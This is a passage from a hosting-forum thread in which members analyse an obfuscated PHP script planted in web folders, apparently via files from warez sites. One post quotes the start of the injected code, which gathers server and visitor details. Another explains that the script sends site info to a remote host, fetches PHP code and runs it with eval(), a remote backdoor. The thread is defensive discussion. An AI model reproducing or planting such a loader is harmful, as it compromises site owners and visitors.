Activity Stream
48,167 MEMBERS
64558 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Page 2 of 2 FirstFirst 12
Results 11 to 17 of 17
  1.     
    #11
    Banned
    Website's:
    Dev-Security.net
    Hi mate this part of the code

    Code: 
    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER
    Is basically showing

    your host name , servername, requested url,referrrer , user agent, the filename stuff like that it can be harmful depending on what it is beign used for

    its encodeing the text in base64 encrypted using functions decalred by the alaphabet characters of A-I

    what it does is sends ppl to a false php page and redirects them to another one

    this attack is being used on TONS of websites

    as welll as this same script is being used in the public

    http://pastebin.com/m6649b7c3


    also read this

    http://wordpress.org/support/topic/220523

  2.   Sponsored Links

  3.     
    #12
    Member
    anyway to stop it?

  4.     
    #13
    Banned
    Website's:
    Dev-Security.net
    have you tried deleting it? also chmode the file to 600 for no execution try that also on the site i think it showed you how to stop it

  5.     
    #14
    Banned
    found this on chillwarez when i bought it there was 2 randomly numbed php files and a .htaccess with the numbered files in it this was in every folder with images

    EDIT: lol that pastebin link was mine
    Quote Originally Posted by William Palmer View Post

    as welll as this same script is being used in the public

    http://pastebin.com/m6649b7c3

  6.     
    #15
    Banned
    Website's:
    Dev-Security.net
    BAAHAHAHAH nice warezdemon i just done a quick google for those scripts

    lol

  7.     
    #16
    Banned
    meh warezwitch has been struck to i just noticed

  8.     
    #17
    Respected Developer
    I reversed this script for demon some time back.

    What it does:
    - Send some site info to website X
    - Retrieve php code from website X
    - eval() (execute) the retrieved php code

    Edit: so basically this can be used as a remote virus or automated shell

Page 2 of 2 FirstFirst 12

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Hacker on a roll!!
    By nYXem in forum General Discussion
    Replies: 19
    Last Post: 25th Oct 2011, 02:56 PM
  2. hacker on KWWH
    By kuzukuzu in forum General Discussion
    Replies: 19
    Last Post: 6th Jun 2011, 09:42 AM
  3. Need a Hacker.
    By -saMmy- in forum Completed Transactions
    Replies: 10
    Last Post: 13th Sep 2010, 06:45 PM
  4. [Buying] need a hacker
    By downloadmaster in forum Completed Transactions
    Replies: 6
    Last Post: 12th Feb 2010, 06:25 PM
  5. Any pro hacker here?
    By anti-human in forum General Discussion
    Replies: 5
    Last Post: 5th Sep 2009, 03:27 PM

Tags for this Thread

BE SOCIAL